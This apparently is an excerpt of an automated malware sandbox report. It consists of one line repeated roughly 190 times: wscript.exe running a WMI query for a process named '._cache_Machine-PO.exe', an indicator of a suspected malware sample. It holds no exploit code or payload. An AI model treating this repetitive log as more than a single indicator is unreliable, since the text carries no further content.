                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
